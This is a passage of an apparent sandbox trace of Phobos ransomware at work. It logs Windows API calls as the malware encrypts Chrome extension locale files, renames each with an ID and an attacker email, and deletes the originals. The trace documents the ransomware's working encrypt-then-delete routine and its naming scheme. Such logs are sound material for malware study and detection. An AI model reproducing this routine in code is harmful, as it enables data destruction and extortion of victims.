hTemplateFile=0x0) returned 0x138 [0153.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.224] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.224] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xeb, lpOverlapped=0x0) returned 1 [0153.225] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.225] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.226] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.226] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.226] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.226] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.226] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.226] CloseHandle (hObject=0x130) returned 1 [0153.226] CloseHandle (hObject=0x138) returned 1 [0153.227] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json")) returned 1 [0153.228] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.228] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=229) returned 1 [0153.228] CloseHandle (hObject=0x138) returned 1 [0153.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json")) returned 0x2020 [0153.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.229] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.229] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.229] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe5, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.267] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.268] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.268] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.268] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.268] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.268] CloseHandle (hObject=0x138) returned 1 [0153.268] CloseHandle (hObject=0x130) returned 1 [0153.269] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json")) returned 1 [0153.270] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.270] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=230) returned 1 [0153.270] CloseHandle (hObject=0x130) returned 1 [0153.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0153.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.271] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.271] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.271] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe6, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.273] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.274] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.274] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.274] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.274] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.274] CloseHandle (hObject=0x130) returned 1 [0153.274] CloseHandle (hObject=0x138) returned 1 [0153.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json")) returned 1 [0153.276] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.276] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=226) returned 1 [0153.276] CloseHandle (hObject=0x138) returned 1 [0153.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json")) returned 0x2020 [0153.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.277] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.277] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.277] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.277] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe2, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.279] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.280] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.280] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.280] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.280] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.280] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.280] CloseHandle (hObject=0x138) returned 1 [0153.280] CloseHandle (hObject=0x130) returned 1 [0153.281] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json")) returned 1 [0153.282] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.282] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=254) returned 1 [0153.282] CloseHandle (hObject=0x130) returned 1 [0153.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json")) returned 0x2020 [0153.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.283] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.283] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.284] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfe, lpOverlapped=0x0) returned 1 [0153.285] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0153.285] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0153.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.286] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.286] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.286] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.286] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.286] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.286] CloseHandle (hObject=0x130) returned 1 [0153.286] CloseHandle (hObject=0x138) returned 1 [0153.286] DeleteFileW 